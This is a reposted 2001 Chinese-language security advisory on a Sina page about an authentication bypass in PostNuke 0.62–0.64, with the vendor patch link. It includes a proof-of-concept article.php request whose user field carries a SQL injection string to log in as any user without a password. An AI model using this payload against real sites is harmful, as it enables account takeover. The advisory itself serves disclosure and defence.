教育天地_新浪网

首页 ● 新闻 ● 搜索 ● 短信 ● 分类 ● 聊天 ● 导航


		<A HREF="http://ad.hk.doubleclick.net/jump/edu.sina.com.cn/literature;abr=!ie;sz=468x60;num=71291505472436136?"><IMG SRC="http://ad.hk.doubleclick.net/ad/edu.sina.com.cn/literature;abr=!ie;sz=468x60;num=71291505472436136?" border=0 height="60" width="468"></A>

新浪首页 > 文化教育 > 网络安全 > 正文

PostNuke未授权的用户登陆漏洞

http://www.sina.com.cn 2001/10/26 16:11 王府培训

　　发布日期: 2001-10-13

　　更新日期: 2001-10-16

　　受影响的系统: Francisco Burzi PostNuke 0.62
　　Francisco Burzi PostNuke 0.63
　　Francisco Burzi PostNuke 0.64
　　- ApachesgroupsApache 1.3.20
　　- Apache

sgroupsApache 1.3.20win32

　　描述:

　　BUGTRAQ ID : 3435

　　PostNuke是在PHPNuke的基础上改进的内容管理系统，发现其0.62到0.64版本存在一个安全漏洞，导致远程攻击者只要知道用户名和用户ID即可不经过认证就登陆进入系统。

　　“article.php”调用“mainfile2.php”中的一个函数“getusrinfo()”更新用户信息，该函数进行了一次数据库查询，但是由于该查询使用了一个不安全的变量，导致攻击者可能改变这个查询串，从而绕过认证直接进入系统。

　　<*来源：Magnus Skjegstad （lists@skjegstad.com）参考：http://archives.neohapsis.com/archives/bugtraq/2001-10/0088.html*>

　　测试程序：

　　警告

　　以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

　　Magnus Skjegstad (lists@skjegstad.com)提供了如下测试代码：

　　article.php?save=1&
　　sid=20&　 [any sid will do..]
　　cookieusrtime=160000& 　[to get a decent expire-date on the cookie]
　　user=USERID:USERNAME:'　or uname='USERNAME　 [base64_encoded]

　　建议:

　　厂商补丁：

　　目前厂商已经发布了补丁程序，请到厂商的主页下载：prdownloads.sourceforge.net/post-nuke/64Mutant_Fix_article.zip

手机铃声下载快乐多多快来搜索好歌!
新浪企业广场诚征全国代理